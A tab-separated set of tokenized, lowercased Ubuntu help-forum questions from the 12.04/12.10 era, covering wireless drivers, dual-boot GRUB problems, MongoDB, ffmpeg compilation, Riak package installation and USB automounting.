265308	how do i get wireless working on my very new macbook pro 9.2 using ubuntu 12.10 ?	i have been trying to figure out how to get my wireless working . i am new with linux but i do consider myself computer savy . i have tried using the official ubuntu help for this problem but i get to a dead end . i think my computer 's wireless chip is to new for many of the help forums . also , when using terminal i found that my wireless is a broadcom bmc4331 . if someone could help me out with getting my wireless set up i would be very thankful . when i type nm-tool into terminal i get this : networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connected default : yes hw address : 40:6c:8f:2c : f1:58 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 10.10.50.247 prefix : 16 ( 255.255.0.0 ) gateway : 10.10.1.1 dns : 8.8.8.8 dns : 4.2.2.2
265311	12.04 64 bit - mouse is not working on startup - keyboard works fine	i recently installed ubuntu 12.04 on my laptop and erased windows 7 . all has been working well , installing things , rebooting it multiple times . but now i got back on it and restarted it and suddenly the mouse does n't work . the keyboard works fine , i can type . and i can even click the mouse . i just ca n't move it around at all on the touchpad , or even with a usb mouse . i 've read a lot of different questions about this , but i have n't found any good answers . i 've read that for some people the mouse activates after like a minute , so far mine has n't been doing that . i also read about this problem being caused by the video drivers in some way , and that would make sense , because i did download a driver for my video card before this happened . but if that is the case , what do i do then ? thanks for the help !
265315	how can i shorten the bash prompt 's current path to one letter per directory ?	i ca n't remember where , but i 've already seen the bash prompt 's current path shortened in an interesting way : every directory contained in the path is replaced by its first letter only . for instance : path/to/some/directory would be shortened to p/t/s/d . how can i reproduce that behavior ?
265320	windows 7 + ubuntu 12.04 + invalid efi file path + boot repair + grub many entries	i 've a asus n56vz with intel core i7 - 3610qm , with win 7 home premium x64 pre-installed . this computer come with efi instead of the traditional bios . when i bought it , i had 3 visible partitions . c ( system ) - with windows and programs ; d ( data ) - in blank , i store my personal data and movies ; e ( recovery ) - software from asus to recovery computer . so , as i 'm at a master 's degree in computer science , i needed to install ubuntu . i made a partition from win 7 , reserving around 35 gb for ubuntu 12.04 . it went fine , and the install was sucessful . i rebooted and i could get into ubuntu . the boot showed 4 entries : 2 for ubuntu , and one for windows and one , for windows recover . when i tried to enter windows 7 , `` windows 7 ( loader ) '' , i got this message : error : invalid efi file path . press any key to continue ... the one for recovery could n't boot either . so i get in ubuntu again , and use repair-tool , which insert new entries on grub . now i have 11 entries ! one of the new entries is called `` windows uefi loader '' . the old entry `` windows 7 ( loader ) '' continued to not work . this new one , `` windows uefi loader '' , got me into windows . and i stooped here . i want a single boot manager with just the two needed options . i think that this is n't perfect , but i do n't know how to solve it . more , if i 'm on windows 7 and i put it to hibernate , when i turn on the computer , i get a black screen and the message saying that it could n't restaure the session . ( i 'm not sure about the exact words . - i was oblied to reboot and start the windows again . ) and this is a major concern . i would like to solve this too . here is the link after running the boot-repair : http : //paste.ubuntu.com/5591789/ this one i made it today , with boot-repair and asking for boot info summary : http : //paste.ubuntu.com/5593329/
265326	how do i add the wsgi_module to the apache2.conf file ?	i am running a 32bit version of apache/ubuntu . i need to edit the /etc/apache2/apache2.conf file . i ca n't seem to find where the module will fit or load .
265328	'appearance ' icon not showing in 'system settings '	i am facing a very peculiar problem , the 'appearance ' icon in 'system settings ' has disappeared and now i can not change the background or control the unity . any ideas how to get it back ?
265337	do many desktop environments slow down the system ?	ubuntu originally has several available desktop environments to be chosen during login ( like gnome and unity ) . i want to install others like kde , lxde , xfce , etc . i wonder if installing many other desktop environments/user interfaces will slow down the system ? or they are static files reside on the disk , and no effect on the system when their corresponding desktop environment are not used ?
265338	find all files modified by a specific user	on ubuntu , is it possible to generate a list of all files in the /home folder that were modified by a specific user ? i want to find a list of all of the files that i have created or modified since i installed ubuntu 12.04 . i mainly want to do this so that i can find all the files that i have created or modified , and then move them to my other ubuntu installation .
265343	minecraft black screen ubunutu 12.10 using java 7	i get these errors when trying to run minecraft . ian @ ian-beast : ~ $ cd ~/.minecraft ian @ ian-beast : ~/.minecraft $ cd /.bin bash : cd : /.bin : no such file or directory ian @ ian-beast : ~/.minecraft $ cd ./bin ian @ ian-beast : ~/.minecraft/bin $ java -jar minecraft.jar exception in thread `` main '' java.lang.noclassdeffounderror : org/lwjgl/lwjglexception at java.lang.class.getdeclaredmethods0 ( native method ) at java.lang.class.privategetdeclaredmethods ( class.java:2451 ) at java.lang.class.getmethod0 ( class.java:2694 ) at java.lang.class.getmethod ( class.java:1622 ) at sun.launcher.launcherhelper.getmainmethod ( launcherhelper.java:494 ) at sun.launcher.launcherhelper.checkandloadmain ( launcherhelper.java:486 ) caused by : java.lang.classnotfoundexception : org.lwjgl.lwjglexception at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) at java.lang.classloader.loadclass ( classloader.java:423 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:308 ) at java.lang.classloader.loadclass ( classloader.java:356 ) ... 6 more any clues on how to fix ?
265345	auto answer with google video call ?	does any one know any way to set up auto-answer for google video calls on an ubuntu machine ? i do n't care which client is used ( empathy , pidgin , in-browser , anything else , etc . ) , and i do n't care how hacky it is ( as long as it does n't take more than a couple of hours to set up ) . for concreteness , by auto-answer i mean that all incoming video calls are automatically answered , with a two-way voice and video connection . thanks !
265347	how to install riak on ubuntu 12.10 ?	has anyone been able to install riak from the basho package ? i 'm following the instructions specified here and am getting 403 forbidden errors during update : erturne @ node10 : ~ $ curl http : //apt.basho.com/gpg/basho.apt.key | sudo apt-key add - % total % received % xferd average speed time time time current dload upload total spent left speed 100 1016 100 1016 0 0 4256 0 -- : -- : -- -- : -- : -- -- : -- : -- 13546 ok erturne @ node10 : ~ $ sudo bash -c `` echo deb http : //apt.basho.com $ ( lsb_release -sc ) main > /etc/apt/sources.list.d/basho.list '' erturne @ node10 : ~ $ sudo apt-get update ign http : //security.ubuntu.com quantal-security inrelease ign http : //us.archive.ubuntu.com quantal inrelease ign http : //apt.basho.com quantal inrelease ign http : //apt.basho.com quantal release.gpg hit http : //security.ubuntu.com quantal-security release.gpg ign http : //us.archive.ubuntu.com quantal-updates inrelease ign http : //apt.basho.com quantal release hit http : //security.ubuntu.com quantal-security release ign http : //us.archive.ubuntu.com quantal-backports inrelease hit http : //us.archive.ubuntu.com quantal release.gpg hit http : //security.ubuntu.com quantal-security/main sources hit http : //us.archive.ubuntu.com quantal-updates release.gpg hit http : //security.ubuntu.com quantal-security/restricted sources hit http : //us.archive.ubuntu.com quantal-backports release.gpg hit http : //security.ubuntu.com quantal-security/universe sources hit http : //us.archive.ubuntu.com quantal release hit http : //security.ubuntu.com quantal-security/multiverse sources hit http : //us.archive.ubuntu.com quantal-updates release hit http : //security.ubuntu.com quantal-security/main i386 packages hit http : //us.archive.ubuntu.com quantal-backports release hit http : //security.ubuntu.com quantal-security/restricted i386 packages hit http : //us.archive.ubuntu.com quantal/main sources hit http : //security.ubuntu.com quantal-security/universe i386 packages hit http : //us.archive.ubuntu.com quantal/restricted sources hit http : //security.ubuntu.com quantal-security/multiverse i386 packages hit http : //us.archive.ubuntu.com quantal/universe sources hit http : //us.archive.ubuntu.com quantal/multiverse sources hit http : //security.ubuntu.com quantal-security/main translation-en err http : //apt.basho.com quantal/main i386 packages 403 forbidden hit http : //us.archive.ubuntu.com quantal/main i386 packages hit http : //us.archive.ubuntu.com quantal/restricted i386 packages ign http : //apt.basho.com quantal/main translation-en_us hit http : //security.ubuntu.com quantal-security/multiverse translation-en ign http : //apt.basho.com quantal/main translation-en hit http : //us.archive.ubuntu.com quantal/universe i386 packages hit http : //us.archive.ubuntu.com quantal/multiverse i386 packages hit http : //security.ubuntu.com quantal-security/restricted translation-en hit http : //us.archive.ubuntu.com quantal/main translation-en hit http : //security.ubuntu.com quantal-security/universe translation-en hit http : //us.archive.ubuntu.com quantal/multiverse translation-en hit http : //us.archive.ubuntu.com quantal/restricted translation-en hit http : //us.archive.ubuntu.com quantal/universe translation-en hit http : //us.archive.ubuntu.com quantal-updates/main sources hit http : //us.archive.ubuntu.com quantal-updates/restricted sources hit http : //us.archive.ubuntu.com quantal-updates/universe sources hit http : //us.archive.ubuntu.com quantal-updates/multiverse sources hit http : //us.archive.ubuntu.com quantal-updates/main i386 packages hit http : //us.archive.ubuntu.com quantal-updates/restricted i386 packages hit http : //us.archive.ubuntu.com quantal-updates/universe i386 packages ign http : //security.ubuntu.com quantal-security/main translation-en_us hit http : //us.archive.ubuntu.com quantal-updates/multiverse i386 packages ign http : //security.ubuntu.com quantal-security/multiverse translation-en_us ign http : //security.ubuntu.com quantal-security/restricted translation-en_us ign http : //security.ubuntu.com quantal-security/universe translation-en_us hit http : //us.archive.ubuntu.com quantal-updates/main translation-en hit http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en hit http : //us.archive.ubuntu.com quantal-updates/restricted translation-en hit http : //us.archive.ubuntu.com quantal-updates/universe translation-en hit http : //us.archive.ubuntu.com quantal-backports/main sources hit http : //us.archive.ubuntu.com quantal-backports/restricted sources hit http : //us.archive.ubuntu.com quantal-backports/universe sources hit http : //us.archive.ubuntu.com quantal-backports/multiverse sources hit http : //us.archive.ubuntu.com quantal-backports/main i386 packages hit http : //us.archive.ubuntu.com quantal-backports/restricted i386 packages hit http : //us.archive.ubuntu.com quantal-backports/universe i386 packages hit http : //us.archive.ubuntu.com quantal-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com quantal-backports/main translation-en hit http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en hit http : //us.archive.ubuntu.com quantal-backports/restricted translation-en hit http : //us.archive.ubuntu.com quantal-backports/universe translation-en ign http : //us.archive.ubuntu.com quantal/main translation-en_us ign http : //us.archive.ubuntu.com quantal/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/main translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-updates/universe translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/main translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com quantal-backports/universe translation-en_us w : failed to fetch http : //apt.basho.com/dists/quantal/main/binary-i386/packages 403 forbidden e : some index files failed to download . they have been ignored , or old ones used instead . erturne @ node10 : ~ $ sudo apt-get install riak reading package lists ... done building dependency tree reading state information ... done e : unable to locate package riak
265348	how do i bind buttons to zoom and workspace switcher in unity ?	previously i used compiz-config for button bindings . i keep hearing that compiz does not work well with unity . is there a way to bind buttons to zoom and workspace switcher without using compiz ?
265355	what is skew value in mongo db database replication ?	i have just started the three mongodb replica servers . i do not understand what is this screw value what it should be on which server ? which values should i monitor i have taken 2 screenshots shown below for primary mongo db server , secondary mongo db server & arbiter mongo db server respectively . # # primary mongo db server -- - location : singapore # # # # secondary mongo db server -- - location : north virginia # # # # arbiter mongo db server -- - location : singapore # # as far as i understand they are in sync very well and all of them are aws instances . i need to know how and what should i monitor ? what kind of maintenance activities should i do & how ? please feel free to let me know if you need any further info . thanks in advance ! !
265356	how to find an application 's command , graphically or otherwise ?	i often find that i need to figure out the command to execute a certain application , such as an alarm clock application or the system monitor . however , many of the actual cli commands to run these are not directly evident . what i usually do is just go to the ubuntu software center , then search for the application 's `` common name '' and hence find its package/command name . i would like to know if there is an easier or more efficient way of doing this . i was wondering if there is a command similar to xprop , where clicking on an open ( graphical ) application would output its command in the terminal . in other words , i am interested in a graphical way of finding an application 's command . for example , if i run such a command and click on system monitor , the terminal would output gnome-system-monitor , etc . thanks . ps . if a solution is not currently available , i would be interested in writing my own script with this functionality . i only know basic bash , however . i realize that should probably go under a separate question , but i 'm just throwing it out there .
265360	how do i minimize all windows in ubuntu 12.10 ?	does anyone know the good working way to minimize all windows in ubuntu 12.1 ? i saw a few articles and did n't find any valuable . for example , ctrl+super+d does n't work . system â preferences â keyboard shortcuts - does n't exist in ubuntu 12.1 . compizconfig manager does n't work properly , it sometimes doesn't minimize all windows for some reason . besides , it 's not recommended to use it ( it was said here on askubuntu )
265368	difference between gtk and gnome	i am new to linux os . can some body help to understand the difference between gnome and gtk+ ?
265371	please give me an ffmpeg tutorial that works on ubuntu 12.04	ffmpeg does not compile . every time there is an error no matter what i do . i installed clean 12.04 , followed the tutorial on ffmpeg website , but it is still not working . if its not libfdk-aac error , it 's libx246 error . can someone please help ? i just tried to follow another tutorial and it complaints about libfdk-aac . i have it installed , multiverse reps are done too , it 's all there . if i remove -- enable-libfdk-aac from ffmpeg ./configure , then it complaints about libx264 . i installed libx264-dev and it works but eventually comes with failed error mentioning x264 : libavcodec/libx264.c:552 : error : undefined reference to 'x264_encoder_open_130 ' collect2 : ld returned 1 exit status make : *** [ ffmpeg_g ] error 1
265373	how to solve the access permission problem for any folders in ubuntu ?	how to do i solve the access permission problem for any folders in ubuntu ? ? i am currently trying to copy a folder from one ubuntu to another ubuntu machine using `` scp '' command . scp -r foldername ipaddress_of_other_machine : directorypath it shows like this : scp : permission denied .
265376	problem with dns in ubuntu 12.04 and mullvad vpn	i hope you are all well . here 's my problem . i was running ubuntu 10.04 , and i got mullvad , a vpn service because it is anonymous and cheap . mullvad vpn service installed perfectly on 10.04 and i used it for a couple of months without any issues . in january i installed ubuntu 12.04 via upgrade from 10.04 , leaving mullvad installed . everything still worked properly . recently , however , with no changes to the software ( as far as i know other than ubuntu updates ) mullvad is n't working correctly . it says it 's connected , but without the green checkmark indicating this which was previously displayed in 12.04 and 10.04 . i could browse the internet until about two days ago . my subscription expired , and i started up mullvad ( but without the option to block connections on failure , because i was not a subscriber ) . i still left mullvad installed , however . later i restarted my computer , and this time did not start mullvad/vpn at all . i could no longer access domain names , except for by typing in ip addresses of sites . i searched via startpage , and i found a couple articles . apparently , i was supposed to move /etc/resolv.conf . edit : i followed the post here and did this : sudo mv /etc/resolv.conf /etc/backup.resolv.conf i did this and now can not access dns . thank you in advance .
265377	gnudialer make problem	i am trying to build gnudialer . i followed these steps to the t. now on the last step , making the gnudialer , i get this error : dispo.h:71:1 : warning : deprecated conversion from string constant to ‘char*’ [ -wwrite-strings ] dispo.h : in function ‘char* dispo2short ( int ) ’ : dispo.h:78:16 : warning : deprecated conversion from string constant to ‘char*’ [ -wwrite-strings ] dispo.h : in function ‘char* dispo2long ( int ) ’ : dispo.h:86:16 : warning : deprecated conversion from string constant to ‘char*’ [ -wwrite-strings ] gnudialer.cpp : in function ‘void doredirect ( const string & , const string & , const string & , const string & , const string & , const string & , const bool & ) ’ : gnudialer.cpp:111:47 : warning : suggest parentheses around ‘ & & ’ within ‘||’ [ -wparentheses ] gnudialer.cpp : in function ‘int main ( int , char** ) ’ : gnudialer.cpp:310:10 : error : ‘umask’ was not declared in this scope gnudialer.cpp:1373:96 : warning : suggest parentheses around ‘ & & ’ within ‘||’ [ -wparentheses ] make : *** [ thegnudialer ] error 1 any suggestions as to where the actual problem is ? done the so called `` google '' search on the world wide webs to no avail .
265380	how can clients authenticate to a proxy without user intervention ?	i would like to set up a number of computers that need to go through a proxy server to get to the outside world . the os is ubuntu 12.04 but the issue seems common to all versions ( are far as i can tell ) . every post i read says to put user : password @ proxy : port in the apt.conf file , and yes that works , but it 's not really a option . the computers are being used by non technical people with a 3 month password change policy . asking them to store their password in plain text , or encrypt their password and put it in a text file is just not going to happen . i can get the computers authenticating to an ad domain and firefox will happily pass the credentials along , but i ca n't get the update or software centre to do the same thing . any suggestions would be appreciated .
265381	how to make a directory permanently writable ?	i am using lamp stack for development and i have a problem with making /var/www permanently writable . i use this command : sudo chmod -r a+rwx /var/www this works , but after putting a web app and accessing it through a browser , it show a `` permission denied '' error . when that happens , i have to the execute the command again . how can i make the directory writable , permanently , without having to run the command again ? thanks !
265382	want to re-instate windows as primary os	i want to move ubuntu off an old drive so i repartitioned it and made windows one partition ( i was dual-booting ) . the problem i have is that i have no idea how to boot into windows after ubuntu had already rewrote the boot priority . can somebody tell me how to reset windows as the default os ?
265384	wifi connected but no internet	i hope someone can help me with this , it was the story of today for me : everything was going ok and my internet worked perfectly for every device i had ( computer , tablet , phone ) except for my two nexus 4 . the wifi wasnt working . so after many many things i upgraded my routers firmware and now they are working ! the problem now is that my ubuntu 12.10 laptop connects to wifi but has no internet ! the same laptop on windows 8 works fine on wifi and the wired connection works fine on ubuntu . cant ping my router , but it says that im connected ( full strength ) by reading other posts i saw that usually they are required to post the output of the following commands : lspci -nn | grep 0280 08:00.0 network controller [ 0280 ] : atheros communications inc. ar9462 wireless network adapter [ 168c:0034 ] ( rev 01 ) ifconfig eth0 link encap : ethernet hwaddr d4 : be : d9:78:2b : f5 up broadcast multicast mtu:1500 metric:1 rx packets:20407 errors:0 dropped:0 overruns:0 frame:0 tx packets:20151 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11477177 ( 11.4 mb ) tx bytes:2805826 ( 2.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5712 errors:0 dropped:0 overruns:0 frame:0 tx packets:5712 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:562475 ( 562.4 kb ) tx bytes:562475 ( 562.4 kb ) wlan0 link encap : ethernet hwaddr a4:17:31:3a:9d:99 inet addr:192.168.0.106 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :a617:31ff : fe3a:9d99/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11328 errors:0 dropped:0 overruns:0 frame:0 tx packets:13289 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8270439 ( 8.2 mb ) tx bytes:2182573 ( 2.1 mb ) edit : cant ping my router , but it says that im connected ( full strength ) netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0
265393	mongodb shell is giving an error while connecting ?	when you try to connect to mongodb it is giving a following error : root @ ip-10-87-37-28 : ~ # mongo mongodb shell version : 2.0.4 connecting to : test fri mar 8 07:40:11 error : could n't connect to server 127.0.0.1 shell/mongo.js:84 exception : connect failed however it is not giving any error while starting the mongodb service . to go through mongodb log please click here . please feel free to ask if any of you need any other information . thanks in advance . please click here for the update log file .
265394	mplayer : your system is too slow to play this !	i just tried playing back a 1080p avchd video file recorded at 60 fps with my sony dslr on my ubuntu 12.04 workstation , and to my surprise mplayer was not able to play the video smoothly . i copied the file to a local hard drive . the video plays slower than it should and the a-v desync continues growing steadily ( about 1 second of desync per 10 seconds of playback ) . one of the 8 cpu threads shoots up to 100 % . i was wondering if this is to be expected on my hardware . its a little hard to believe , considering that my t60 laptop plays the video just fine , so i suspect software issues . workstation specs : cpu : intel quad core i7-920 @ 2.67ghz gpu : nvidia geforce 9600 gso 512 ram : 8gb compiz if functioning smoothly , although i have turned it off for this testing ( no improvement in video playback ) the system is generally lightning fast and responsive . playing an mp4 with h264 1080p stream at 30 fps works fine . root @ boss : ~ # glxinfo | grep direct direct rendering : yes root @ boss : ~ # glxinfo | grep vendor server glx vendor string : nvidia corporation client glx vendor string : nvidia corporation opengl vendor string : nvidia corporation mplayer output : valprj @ boss : ~ $ mplayer 00006.mts mplayer svn r34540 ( ubuntu ) , built with gcc-4.6 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing 00006.mts . libavformat version 53.21.1 ( external ) mismatching header version 53.19.0 ts file format detected . video h264 ( pid=4113 ) audio a52 ( pid=4352 ) sub teletext ( pid=4608 ) program n. 1 fps seems to be : 59.940060 load subtitles in ./ ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family libavcodec version 53.35.0 ( external ) mismatching header version 53.32.2 selected video codec : [ ffh264 ] vfm : ffmpeg ( ffmpeg h.264 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 256.0 kbit/16.67 % ( ratio : 32000- > 192000 ) selected audio codec : [ ffac3 ] afm : ffmpeg ( ffmpeg ac-3 ) ========================================================================== ao : [ alsa ] 48000hz 2ch s16le ( 2 bytes per sample ) starting playback ... unsupported pixelformat 61 unsupported pixelformat 53 unsupported pixelformat 81 movie-aspect is 1.78:1 - prescaling to correct movie aspect . vo : [ vdpau ] 1920x1080 = > 1920x1080 planar yv12 a : 6.6 v : 6.1 a-v : 0.496 ct : -0.017 453/453 96 % 10 % 0.6 % 221 0 ************************************************ **** your system is too slow to play this ! **** ************************************************ possible reasons , problems , workarounds : - most common : broken/buggy _audio_ driver - try -ao sdl or use the oss emulation of alsa . - experiment with different values for -autosync , 30 is a good start . - slow video output - try a different -vo driver ( -vo help for a list ) or try -framedrop ! - slow cpu - do n't try to play a big dvd/divx on a slow cpu ! try some of the lavdopts , e.g . -vfm ffmpeg -lavdopts lowres=1 : fast : skiploopfilter=all . - broken file - try various combinations of -nobps -ni -forceidx -mc 0 . - slow media ( nfs/smb mounts , dvd , vcd etc ) - try -cache 8192 . - are you using -cache to play a non-interleaved avi file ? - try -nocache . read docs/html/en/video.html for tuning/speedup tips . if none of this helps you , read docs/html/en/bugreports.html . a : 7.8 v : 7.2 a-v : 0.602 ct : -0.017 520/520 97 % 10 % 0.6 % 286 0 [ h264 @ 0x7fe0a0468380 ] concealing 136 dc , 136 ac , 136 mv errors a : 17.1 v : 15.6 a-v : 1.495 ct : -0.017 1022/1022 97 % 9 % 0.6 % 779 0 exiting ... ( quit ) things i tried playing with -vc ffh264vdpau helped a bit . the desync ratio became 1 second of desync per 34 seconds of playback , and the video speed is almost right . the cpu usage went down significantly ( 20 % on highest cpu thread ) . yet i still get the : your system is too slow to play this ! message from mplayer . playing with -lavdopts skiploopfilter=all made the video play properly . the cpu hovers at around 93 % and a-v sync hovers around 0.263s question so my question is this - would you say it 's reasonable for mplayer to have this much trouble playing back that video on my hardware , or do you figure that there is a software problem here ? maybe the nvidia driver ? any ideas would be appreciated !
265404	ca n't test ubuntu from cd	when i 'm trying to boot linux by selecting , ,try linux , , in cd menu after 5 minutes of loading i see static screen with ubuntu logo ( dots are not blinking ) i also tried to boot from , ,install linux , , but i had the same problem . what should i do to fix it ?
265405	how do i uninstall old version of libreoffice ?	i gon na update my libreoffice 3.5.7.2 to 4.0.1 . manual shouts if you have a previous version of libreoffice already installed , then you will need to de-install it before proceeding further . but how do i uninstall it properly ? p.s.i have ubuntu 12.04 .
265406	sound menu gone missing after pulseaudio 3.0 install	yesterday i was trying to minimize the lag when streaming music from my ubuntu 12.10 laptop to my pulseaudio server on my raspberry pi , by installing pulseaudio 3.0 on the raspberry pi and then again on my 12.10 laptop . unfortunately i did not see what i uninstalled when i installed pulseaudio client 3.0 via 13.04 repository , and after the install and reboot i am missing my sound menu from systray and when i click on sound in gnome control center nothing happens . what did i uninstall that i should not have ?
265410	bios shows ubuntu 'missing or corrupt '	installation from official ubuntu 12.10 dvd appeared to go fine but on restarting i get a 'missing or corrupt ' message and nothing further . the installation was alongside windows 7 on an asus x401a laptop . windows is unaffected . any answers ?
265414	do i need to install ivybridge a chipset driver for ubuntu 12.10 ?	the problem is that lm-sensors does n't detect more than 2 sensors . could be this happen because drivers for chipset are not installed ? where i can get them ? is it already builtin in linux kernel ? system : ubuntu 12.10 . dell inspiron r15 / i7 / mobile intel hm76 express chipset .
265424	set openjdk as default application	i 'm trying to create a launcher for minecraft , but in order to make a proper working launcher i need to have openjdk java 7 set as the default application for opening the .jar file . here 's the problem : when i look at the open with tab of its properties window , there 's no way to select openjdk . what do ?
265425	number of processes called espeak	running 12.04 on an ltsp network . a number of users seem to have a large number of espeak processes running , yet they seem to using libreoffice and not consciously using any speech synthesis
265427	how do i get the wifi ip address on ubuntu touch	is it possible to get the ip-address of the wireless connection on a mobile device with ubuntu touch even when it 's not connected via usb ?
265431	all my desktop icons have disappeared in gnome shell ubuntu 12.10 after 6 march update	i have lost all desktop icons after updating on 6 march . i updated from canonical 's archive directly as i thought they would test software before they release it . when i run gnome tweak tool it says there are no extensions installed . they were all there on 5 march but not on 6 march after update . i tried to download them again but they are greyed out and will not install . how can i get my icons back in gnome shell ? thanks . the only desktop that works is gnome classic ( no effects ) all the others are blank with a mouse pointer that moves but does nothing .
265432	ubuntu 12.10 firefox v19.0 fails to install missing plugins for adobe flash	i have recently installed ubuntu 12.10 on my windows 8 machine , using firefox for web browsing . but for flash based sites , i get this missing plug-in error `` additional plugins are needed to display all the medias on this page '' , but if i go to the adobe flash page and download and copy the files from the *.tar.gz , this problem is not going away . i got ubuntu 64 bit and found this message from the size when downloaded the tar file . adobe flash player version 11.2.202.273 your system : linux 64-bit , firefox | 6.90 mb http : //get.adobe.com/flashplayer/ ? fpchrome install_flash_player_11_linux.x86_64.tar.gz any suggestion is highly appreciated .
265438	ubuntu on asus asus x53e sx088v ?	i am new at ubuntu . i put on my old hp laptop for testing . i really like it and i would like to put it on my asus x53e sx088v . but it is not listed on the ubuntu website of supportet laptops . is it really not possible to use ubuntu on it ? where might be the risk ?
265443	unable to locate package gcc-defaults error	this is the command i use : sudo apt-get install -y gcc-defaults when i run it , the terminal shows the error message : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gcc-defaults why ? i 'm using ubuntu 12.10 .
265445	is lubuntu the only derivative with its own software center ?	i 've noticed that lubuntu has its own software center application , which seems a bit less taxing on my poor netbook than the vanilla sc . is lubuntu the only derivative that takes this approach , or are there other derivatives with their own software centers ? also , are there any software center alternatives that are not pre-installed in any official ubuntu derivative , but which are available in the repositories ?
265446	installing ros on 12.04 or 12.10	i have ubuntu 12.04 and 12.10 installed on my machine and i want to install ros i had a discussion with a friend who told me that it would be better to use ubuntu 11.10 for ros . i am a new ubuntu and ros and would like to understand is my friend correct ? can ros run successfully on my 12.04/12.10 machine or do i need to install 11.10 ?
265447	installing php imagick to xampp	i am trying this : sudo apt-get install imagemagick libmagickwand-dev sudo pecl install imagick and i getting an error at the end like : /tmp/pear/temp/imagick/imagick_class.c:9534:2 : error : 'struct _php_core_globals ' has no member named 'safe_mode' /tmp/pear/temp/imagick/imagick_class.c:9534:2 : error : 'checkuid_check_file_and_dir ' undeclared ( first use in this function ) /tmp/pear/temp/imagick/imagick_class.c:9534:2 : error : 'checkuid_no_errors ' undeclared ( first use in this function ) make : *** [ imagick_class.lo ] error 1 error : `make ' failed so my question is what are the requirements for installing imagick 's latest version on ubuntu . and its procedure to install ? i have : php version 5.4.7 xampp for linux 1.8.1 -thanks
265450	gnome desktop menu layout problem	i have added a 'quick setup ' sub-menu of 'system ' desktop menu . i want this sub-menu to contains some desktop files within two sections , separated with a separator . i need the first part to contains my own desktop files with it 's own ( custom ) category , and the second part to contains existing system desktop files . to achieve this i wrote a file /etc/xdg/menus/settings-merged/quick-setup.menu that contains : < menu > < name > desktop < /name > < directory > x-gnome-menu-system.directory < /directory > < ! -- quick server setup -- > < menu > < name > quick setup < /name > < directory > quickserversetup.directory < /directory > < include > < filename > keyboard.desktop < /filename > < filename > language-selector.desktop < /filename > < filename > nm-connection-editor.desktop < /filename > < filename > teamviewer-teamviewer7.desktop < /filename > < category > x-quicksetup < /category > < /include > < layout > < filename > keyboard.desktop < /filename > < filename > language-selector.desktop < /filename > < filename > nm-connection-editor.desktop < /filename > < filename > teamviewer-teamviewer7.desktop < /filename > < separator/ > < /layout > < /menu > < ! -- end quick server setup -- > < /menu > with this < layout > the result is almost what i want but a problem remains : it is not displayed in the right order ! desktop entries from the x-quicksetup category are displayed after the separator ( position of < category > tag within < include > node does n't affect items visual order ) . i could specify each filename in the section but i 'll loose the interest of writing a < category > ! ! ? ? and of course , i ca n't add < category > tag to the < layout > node ... what should i do , do display two distinct sections within a given order ? ? thanks ! !
265451	mysql client not found in ubuntu and i ca n't re-install it !	( on ubuntu 12.04 ) the following terminal output is pretty much self-explanatory : [ 11:34:28 ] drossi @ d ~/dbdumps $ mysql the program 'mysql ' is currently not installed . you can install it by typing : sudo apt-get install mysql-client-core-5.5 [ 11:36:12 ] drossi @ d ~/dbdumps $ sudo apt-get install mysql-client-core-5.5 reading package lists ... done building dependency tree reading state information ... done mysql-client-core-5.5 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 20 not upgraded . [ 11:36:15 ] drossi @ d ~/dbdumps $ mysql the program 'mysql ' is currently not installed . you can install it by typing : sudo apt-get install mysql-client-core-5.5 i tried apt-get purge , apt-get autoclean ... but nothing . the binary is not in usr/bin . how do i solve this ?
265452	automatic mount any external drive under /media with read/write access to everyone	here is my issue : my computer has 4 usb ports and is running ubuntu 12.10 . i receive different usbs every day , plug to my computer , read/write data to them , and then send them away . what i want is to automatically mount any usb i plug into my computer . the first detected usb will go to /media/hdd1 , the second will go to /media/hdd2 and so on . or it would be great if usb plugged to port1 will go to /media/hdd1 , usb plugged to port2 will go to /media/hdd2 , and so on . the path /media is not important but i would like the hdd1-4 directories in one place so that i can easily access them . the usbs are normally ext2 but sometimes i get fat32 , ntfs usbs as well . i also want usb to be mounted without logging in to ubuntu as i often access /media/hdd.. from another windows computer . how can i do that ? what change in udev rules , fstab should i make ? any suggestion is highly appreciated .
